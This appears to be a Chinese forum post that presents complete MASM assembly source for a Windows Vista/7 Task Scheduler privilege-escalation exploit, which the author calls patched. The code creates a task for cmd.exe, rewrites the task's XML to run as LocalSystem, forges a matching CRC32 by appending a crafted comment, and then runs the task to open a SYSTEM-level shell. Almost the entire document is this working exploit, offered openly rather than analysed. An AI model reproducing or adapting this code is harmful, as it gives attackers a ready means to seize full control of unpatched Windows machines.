关于vista/window7 计划服务0day的汇编代码。打补丁了,没啥用了。代码是创建一个system权限的cmd进程。.386 .model flat,stdcall option casemap:none include windows.inc include user32.inc include kernel32.inc include advapi32.inc include shlwapi.inc include shell32.inc includelib user32.lib includelib kernel32.lib includelib advapi32.lib includelib shlwapi.lib includelib shell32.lib .data Crc_Table \ dd 00000000h, 77073096h, 0EE0E612Ch, 990951BAh, 076DC419h dd 706AF48Fh, 0E963A535h, 9E6495A3h, 0EDB8832h, 79DCB8A4h dd 0E0D5E91Eh, 97D2D988h, 09B64C2Bh, 7EB17CBDh, 0E7B82D07h dd 90BF1D91h, 1DB71064h, 6AB020F2h, 0F3B97148h, 84BE41DEh dd 1ADAD47Dh, 6DDDE4EBh, 0F4D4B551h, 83D385C7h, 136C9856h dd 646BA8C0h, 0FD62F97Ah, 8A65C9ECh, 14015C4Fh, 63066CD9h dd 0FA0F3D63h, 8D080DF5h, 3B6E20C8h, 4C69105Eh, 0D56041E4h dd 0A2677172h, 3C03E4D1h, 4B04D447h, 0D20D85FDh, 0A50AB56Bh dd 35B5A8FAh, 42B2986Ch, 0DBBBC9D6h, 0ACBCF940h, 32D86CE3h dd 45DF5C75h, 0DCD60DCFh, 0ABD13D59h, 26D930ACh, 51DE003Ah dd 0C8D75180h, 0BFD06116h, 21B4F4B5h, 56B3C423h, 0CFBA9599h dd 0B8BDA50Fh, 2802B89Eh, 5F058808h, 0C60CD9B2h, 0B10BE924h dd 2F6F7C87h, 58684C11h, 0C1611DABh, 0B6662D3Dh, 76DC4190h dd 01DB7106h, 98D220BCh, 0EFD5102Ah, 71B18589h, 06B6B51Fh dd 9FBFE4A5h, 0E8B8D433h, 7807C9A2h, 0F00F934h, 9609A88Eh dd 0E10E9818h, 7F6A0DBBh, 086D3D2Dh, 91646C97h, 0E6635C01h dd 6B6B51F4h, 1C6C6162h, 856530D8h, 0F262004Eh, 6C0695EDh dd 1B01A57Bh, 8208F4C1h, 0F50FC457h, 65B0D9C6h, 12B7E950h dd 8BBEB8EAh, 0FCB9887Ch, 62DD1DDFh, 15DA2D49h, 8CD37CF3h dd 0FBD44C65h, 4DB26158h, 3AB551CEh, 0A3BC0074h, 0D4BB30E2h dd 4ADFA541h, 3DD895D7h, 0A4D1C46Dh, 0D3D6F4FBh, 4369E96Ah dd 346ED9FCh, 0AD678846h, 0DA60B8D0h, 44042D73h, 33031DE5h dd 0AA0A4C5Fh, 0DD0D7CC9h, 5005713Ch, 270241AAh, 0BE0B1010h dd 0C90C2086h, 5768B525h, 206F85B3h, 0B966D409h, 0CE61E49Fh dd 5EDEF90Eh, 29D9C998h, 0B0D09822h, 0C7D7A8B4h, 59B33D17h dd 2EB40D81h, 0B7BD5C3Bh, 0C0BA6CADh, 0EDB88320h, 9ABFB3B6h dd 03B6E20Ch, 74B1D29Ah, 0EAD54739h, 9DD277AFh, 04DB2615h dd 73DC1683h, 0E3630B12h, 94643B84h, 0D6D6A3Eh, 7A6A5AA8h dd 0E40ECF0Bh, 9309FF9Dh, 0A00AE27h, 7D079EB1h, 0F00F9344h dd 8708A3D2h, 1E01F268h, 6906C2FEh, 0F762575Dh, 806567CBh dd 196C3671h, 6E6B06E7h, 0FED41B76h, 89D32BE0h, 10DA7A5Ah dd 67DD4ACCh, 0F9B9DF6Fh, 8EBEEFF9h, 17B7BE43h, 60B08ED5h dd 0D6D6A3E8h, 0A1D1937Eh, 38D8C2C4h, 4FDFF252h, 0D1BB67F1h dd 0A6BC5767h, 3FB506DDh, 48B2364Bh, 0D80D2BDAh, 0AF0A1B4Ch dd 36034AF6h, 41047A60h, 0DF60EFC3h, 0A867DF55h, 316E8EEFh dd 4669BE79h, 0CB61B38Ch, 0BC66831Ah, 256FD2A0h, 5268E236h dd 0CC0C7795h, 0BB0B4703h, 220216B9h, 5505262Fh, 0C5BA3BBEh dd 0B2BD0B28h, 2BB45A92h, 5CB36A04h, 0C2D7FFA7h, 0B5D0CF31h dd 2CD99E8Bh, 5BDEAE1Dh, 9B64C2B0h, 0EC63F226h, 756AA39Ch dd 026D930Ah, 9C0906A9h, 0EB0E363Fh, 72076785h, 05005713h dd 95BF4A82h, 0E2B87A14h, 7BB12BAEh, 0CB61B38h, 92D28E9Bh dd 0E5D5BE0Dh, 7CDCEFB7h, 0BDBDF21h, 86D3D2D4h, 0F1D4E242h dd 68DDB3F8h, 1FDA836Eh, 81BE16CDh, 0F6B9265Bh, 6FB077E1h dd 18B74777h, 88085AE6h, 0FF0F6A70h, 66063BCAh, 11010B5Ch dd 8F659EFFh, 0F862AE69h, 616BFFD3h, 166CCF45h, 0A00AE278h dd 0D70DD2EEh, 4E048354h, 3903B3C2h, 0A7672661h, 0D06016F7h dd 4969474Dh, 3E6E77DBh, 0AED16A4Ah, 0D9D65ADCh, 40DF0B66h dd 37D83BF0h, 0A9BCAE53h, 0DEBB9EC5h, 47B2CF7Fh, 30B5FFE9h dd 0BDBDF21Ch, 0CABAC28Ah, 53B39330h, 24B4A3A6h, 0BAD03605h dd 0CDD70693h, 54DE5729h, 23D967BFh, 0B3667A2Eh, 0C4614AB8h dd 5D681B02h, 2A6F2B94h, 0B40BBE37h, 0C30C8EA1h, 5A05DF1Bh dd 2D02EF8Dh g_AuthorFrontChar db '<',0,'A',0,'u',0,'t',0,'h',0,'o',0,'r',0,'>',0 g_AuthorBackChar db '<',0,'/',0,'A',0,'u',0,'t',0,'h',0,'o',0,'r',0,'>',0 g_UserIdFrontChar db '<',0,'U',0,'s',0,'e',0,'r',0,'I',0,'d',0,'>',0 g_UserIdBackChar db '<',0,'/',0,'U',0,'s',0,'e',0,'r',0,'I',0,'d',0,'>',0 g_SystemUser db 'L',0,'o',0,'c',0,'a',0,'l',0,'S',0,'y',0,'s',0,'t',0,'e',0,'m',0 g_UserId db 'S',0,'-',0,'1',0,'-',0,'5',0,'-',0,'1',0,'8',0 g_NoteBegin db '<',0,'!',0,'-',0,'-',0 g_NoteEnd db '-',0,'-',0,'>',0 g_Header db 0FFh,0FEh g_TaskXml db "\Tasks\xml",0 g_TaskCreate db "/create /TN xml /sc monthly /tr %s%s%s",0 g_TaskDelete db "/delete /f /TN xml",0 g_TaskDisable db "/change /TN xml /disable",0 g_TaskEnable db "/change /TN xml /enable",0 g_TaskRun db "/run /TN xml",0 g_TaskExe db "schtasks",0 g_Qus db '"',0 g_Cmd db 'cmd.exe',0 .code ;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> ; 取得一个文件的句柄 ;<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<< GetFileHandle proc szPath:DWORD invoke CreateFile,szPath,\ GENERIC_READ or GENERIC_WRITE,\ FILE_SHARE_READ or FILE_SHARE_WRITE,\ NULL,OPEN_EXISTING,\ FILE_ATTRIBUTE_NORMAL,NULL .if ( eax == INVALID_HANDLE_VALUE ) xor eax,eax .endif ret GetFileHandle endp ;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> ; 从指定文件中读取数据 ;<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<< ReadFileText proc hFile:DWORD, pDataSize:DWORD LOCAL dwLow:DWORD,dwHigh:DWORD,dwNum:DWORD LOCAL pMem:DWORD invoke GetFileSize,hFile,addr dwHigh mov dwLow,eax invoke GlobalAlloc,GMEM_FIXED or GMEM_ZEROINIT,dwLow .if ( eax == 0 ) xor eax,eax ret .endif mov pMem,eax invoke ReadFile,hFile,pMem,dwLow,addr dwNum,NULL mov eax,pDataSize push dwLow pop [eax] mov eax, pMem ret ReadFileText endp ;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> ; 把数据写入指定文件 ;<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<< WriteFileText proc hFile:DWORD, pXml:DWORD, XmlSize:DWORD LOCAL dwNum:DWORD invoke SetFilePointer,hFile,0,0,FILE_BEGIN invoke WriteFile,hFile,pXml,XmlSize,addr dwNum,NULL ret WriteFileText endp ;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> ; 计算文本CRC值 ;<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<< Calc_Crc proc szXmlTxt:DWORD, XmlSize:DWORD LOCAL Crc_value:DWORD mov Crc_value,0FFFFFFFFh pushad lea edx,Crc_Table mov esi,szXmlTxt mov ecx,0 .while( ecx < XmlSize ) xor eax,eax mov al, byte ptr[esi + ecx] xor eax, Crc_value and eax, 000000FFh mov ebx, [edx + eax*4] shr Crc_value,8 xor Crc_value,ebx inc ecx .endw popad mov eax,Crc_value xor eax,0FFFFFFFFh ret Calc_Crc endp ;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> ; 计算需要修复CRC值的一个值 ;<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<< rev_crc proc leadStr:DWORD,leadStrSize:DWORD,endStr:DWORD,endStrSize:DWORD,OldCrc:DWORD LOCAL Crc_value:DWORD,crc:DWORD,TableIndex:DWORD,Table_value:DWORD mov Crc_value,0FFFFFFFFh pushad lea edx,Crc_Table mov esi,leadStr mov ecx,0 .while ( ecx < leadStrSize ) xor eax,eax mov al, byte ptr[esi + ecx] xor eax, Crc_value and eax, 000000FFh mov ebx, [edx + eax*4] shr Crc_value,8 xor Crc_value,ebx inc ecx .endw popad mov eax,OldCrc xor eax,0FFFFFFFFh mov crc,eax pushad lea edx,Crc_Table mov esi,endStr mov ecx,0 .while ( ecx < endStrSize ) xor eax,eax mov TableIndex,eax mov eax, [edx + eax*4] mov Table_value,eax LP1: xor eax, crc shr eax,24 and eax,000000FFh .if (eax) INC TableIndex mov eax,TableIndex mov eax,[edx+eax*4] mov Table_value,eax jmp LP1 .endif mov eax,Table_value xor crc,eax shl crc,8 mov eax,endStrSize sub eax,ecx dec eax xor ebx,ebx mov bl,[esi + eax] xor ebx,TableIndex or crc,ebx inc ecx .endw popad mov eax,crc pushad lea edx,Crc_Table mov ecx,0 .while ( ecx < 4 ) xor eax,eax mov TableIndex,eax mov eax, [edx + eax*4] mov Table_value,eax LP2: xor eax, crc shr eax,24 and eax,000000FFh .if (eax) INC TableIndex mov eax,TableIndex mov eax,[edx+eax*4] mov Table_value,eax jmp LP2 .endif mov eax,Table_value xor crc,eax shl crc,8 mov eax,TableIndex or crc,eax inc ecx .endw popad mov eax,Crc_value xor eax,crc ret rev_crc endp ;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> ; 与memcpy函数功能一致 ;<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<< mymemcmp proc pBuf1:DWORD,pBuf2:DWORD,dwSize:DWORD LOCAL dwOff:DWORD mov dwOff,0 pushad mov edi,pBuf1 mov esi,pBuf2 xor ecx,ecx .while (ecx < dwSize) mov al,byte ptr[edi+ecx] .if (al != byte ptr[esi+ecx]) inc ecx mov dwOff,ecx .break .endif inc ecx .endw popad mov eax,dwOff ret mymemcmp endp ;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> ; 修改XML文件中的用户名和UserId ;<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<< ChangeXmlText proc pXml:DWORD,XmlSize:DWORD, pNewXmlSize:DWORD LOCAL AuthorBeginOffset:DWORD,AuthorEndOffset:DWORD,UserIdBeginOffset:DWORD,UserIdEndOffset:DWORD LOCAL NewXmlSize:DWORD,pNewXml:DWORD mov AuthorBeginOffset,0 mov AuthorEndOffset,0 mov UserIdBeginOffset,0 mov UserIdEndOffset,0 pushad xor ecx,ecx .while (ecx < XmlSize) .if ( AuthorBeginOffset == NULL ) mov eax,pXml add eax,ecx invoke mymemcmp,eax,offset g_AuthorFrontChar, sizeof g_AuthorFrontChar .if ( eax == 0 ) mov AuthorBeginOffset, ecx add AuthorBeginOffset,sizeof g_AuthorFrontChar .endif inc ecx .continue .endif .if ( AuthorEndOffset == NULL ) mov eax,pXml add eax,ecx invoke mymemcmp,eax,offset g_AuthorBackChar, sizeof g_AuthorBackChar .if ( eax == 0 ) mov AuthorEndOffset, ecx .endif inc ecx .continue .endif .if ( UserIdBeginOffset == NULL ) mov eax,pXml add eax,ecx invoke mymemcmp,eax,offset g_UserIdFrontChar, sizeof g_UserIdFrontChar .if ( eax == 0 ) mov UserIdBeginOffset, ecx add UserIdBeginOffset, sizeof g_UserIdFrontChar .endif inc ecx .continue .endif .if ( UserIdEndOffset == NULL ) mov eax,pXml add eax,ecx invoke mymemcmp,eax,offset g_UserIdBackChar, sizeof g_UserIdBackChar .if ( eax == 0 ) mov UserIdEndOffset, ecx .endif inc ecx .continue .endif inc ecx .endw popad mov eax,AuthorBeginOffset mov eax,AuthorEndOffset mov eax,UserIdBeginOffset mov eax,UserIdEndOffset mov eax,XmlSize add eax,1024 invoke GlobalAlloc,GMEM_FIXED or GMEM_ZEROINIT,eax .if ( eax == NULL ) ret .endif mov pNewXml,eax pushad mov edi,pNewXml mov esi,pXml mov NewXmlSize,0 invoke RtlMoveMemory,edi,esi,AuthorBeginOffset mov eax,AuthorBeginOffset add NewXmlSize,eax mov edi,pNewXml add edi,NewXmlSize invoke RtlMoveMemory,edi,offset g_SystemUser,sizeof g_SystemUser add NewXmlSize,sizeof g_SystemUser mov esi,pXml add esi,AuthorEndOffset mov edi,pNewXml add edi,NewXmlSize mov ecx,UserIdBeginOffset sub ecx,AuthorEndOffset push ecx invoke RtlMoveMemory,edi,esi,ecx pop ecx add NewXmlSize,ecx mov edi,pNewXml add edi,NewXmlSize invoke RtlMoveMemory,edi,offset g_UserId, sizeof g_UserId add NewXmlSize,sizeof g_UserId mov esi,pXml add esi,UserIdEndOffset mov edi,pNewXml add edi,NewXmlSize mov ecx,XmlSize sub ecx,UserIdEndOffset push ecx invoke RtlMoveMemory,edi,esi,ecx pop ecx add NewXmlSize,ecx popad mov eax,pNewXmlSize push NewXmlSize pop [eax] mov eax,pNewXml ret ChangeXmlText endp ;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> ; 修改XML文件中的用户名和UserId,修正文件CRC值 ;<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<< ConfigXmlFile proc FilePath:DWORD LOCAL hFile:DWORD,OldXmlSize:DWORD,pOldXml:DWORD,OldCrc32:DWORD,FixCrc:DWORD LOCAL pXmlNoteBegin:DWORD,XmlNoteBeginSize:DWORD LOCAL pNewXml:DWORD,NewXmlSize:DWORD LOCAL pEndXml:DWORD,dwEndXmlSize:DWORD pushad invoke GetFileHandle, FilePath mov hFile,eax invoke ReadFileText,hFile,addr OldXmlSize mov pOldXml,eax .if (pOldXml == NULL) invoke CloseHandle,hFile popad ret .endif ;取得原来的CRC值。 mov edi,pOldXml add edi,sizeof g_Header mov eax,OldXmlSize sub eax,sizeof g_Header invoke Calc_Crc,edi,eax mov OldCrc32,eax ;获取CRC值完毕。 ;开始改写XML文本中的字符串,返回新的XML文本地址 invoke ChangeXmlText, pOldXml, OldXmlSize, addr NewXmlSize mov pNewXml,eax invoke GlobalFree,pOldXml .if (pNewXml == NULL) invoke CloseHandle,hFile popad ret .endif ;改写XML字符串完毕 ;计算需要修复crc需要的一个修正值 mov ecx,NewXmlSize sub ecx,2 add ecx,sizeof g_NoteBegin mov XmlNoteBeginSize,ecx invoke GlobalAlloc,GMEM_FIXED or GMEM_ZEROINIT,XmlNoteBeginSize mov pXmlNoteBegin,eax .if ( pXmlNoteBegin == NULL ) invoke GlobalFree,pNewXml invoke CloseHandle,hFile popad ret .endif mov edi,pNewXml add edi,sizeof g_Header mov ecx,NewXmlSize sub ecx,2 push ecx invoke RtlMoveMemory,pXmlNoteBegin,edi,ecx invoke GlobalFree,pNewXml pop ecx mov edi,pXmlNoteBegin add edi,ecx invoke RtlMoveMemory,edi,offset g_NoteBegin,sizeof g_NoteBegin invoke rev_crc,pXmlNoteBegin,XmlNoteBeginSize,offset g_NoteEnd,sizeof g_NoteEnd,OldCrc32 mov FixCrc,eax ;计算修复用的值完毕。 ;开始合并XML各个部分,组成新的CRC正确的XML文本 mov ecx,sizeof g_Header add ecx,XmlNoteBeginSize add ecx,4 add ecx,sizeof g_NoteEnd mov dwEndXmlSize,ecx invoke GlobalAlloc,GMEM_FIXED or GMEM_ZEROINIT,dwEndXmlSize mov pEndXml,eax .if ( pEndXml == NULL ) invoke GlobalFree,pXmlNoteBegin invoke CloseHandle,hFile popad ret .endif invoke RtlMoveMemory,pEndXml, offset g_Header, sizeof g_Header mov ecx,sizeof g_Header push ecx mov edi,pEndXml add edi,ecx invoke RtlMoveMemory,edi,pXmlNoteBegin,XmlNoteBeginSize pop ecx add ecx,XmlNoteBeginSize push ecx mov edi,pEndXml add edi,ecx invoke RtlMoveMemory, edi, addr FixCrc, 4 pop ecx add ecx,4 mov edi,pEndXml add edi,ecx invoke RtlMoveMemory, edi, offset g_NoteEnd, sizeof g_NoteEnd ;XML合并完毕 ;校验值是否正确 mov edi,pEndXml add edi,2 mov ecx,dwEndXmlSize sub ecx,2 invoke Calc_Crc,edi,ecx ;把合并后的XML写入到文件 invoke WriteFileText,hFile,pEndXml,dwEndXmlSize invoke CloseHandle,hFile ;写入完毕 popad ret ConfigXmlFile endp ;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> ; Bypass uac代码部分 ;<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<< ByPassUac proc LOCAL FilePath[1024]:BYTE,szCmd[1024]:BYTE LOCAL CurPath[1024]:BYTE,szTemp[1024]:BYTE LOCAL eInfo:SHELLEXECUTEINFO invoke RtlZeroMemory,addr eInfo,sizeof eInfo mov eInfo.cbSize,sizeof eInfo mov eInfo.fMask,SEE_MASK_NOCLOSEPROCESS mov eInfo.nShow,SW_HIDE mov eInfo.lpFile,offset g_TaskExe invoke RtlZeroMemory,addr FilePath,sizeof FilePath invoke GetSystemDirectory,addr FilePath,sizeof FilePath invoke lstrcat,addr FilePath,offset g_TaskXml invoke wsprintf,addr szCmd,\ offset g_TaskCreate,\ offset g_Qus,\ offset g_Cmd,\ offset g_Qus ;先删除同名的计划 mov eInfo.lpParameters,offset g_TaskDelete invoke ShellExecuteEx,addr eInfo invoke WaitForSingleObject,eInfo.hProcess,INFINITE ;创建计划 lea eax,szCmd mov eInfo.lpParameters,eax invoke ShellExecuteEx,addr eInfo invoke WaitForSingleObject,eInfo.hProcess,INFINITE ;修改XML文件 invoke ConfigXmlFile,addr FilePath ;开关计划 mov eInfo.lpParameters,offset g_TaskDisable invoke ShellExecuteEx,addr eInfo invoke WaitForSingleObject,eInfo.hProcess,INFINITE mov eInfo.lpParameters,offset g_TaskEnable invoke ShellExecuteEx,addr eInfo invoke WaitForSingleObject,eInfo.hProcess,INFINITE ;启动计划 mov eInfo.lpParameters,offset g_TaskRun invoke ShellExecuteEx,addr eInfo invoke WaitForSingleObject,eInfo.hProcess,INFINITE ret ByPassUac endp ;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> ; 程序入口点。 ;<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<< start: invoke ByPassUac invoke ExitProcess,0 ret end start
浙公网安备 33010602011771号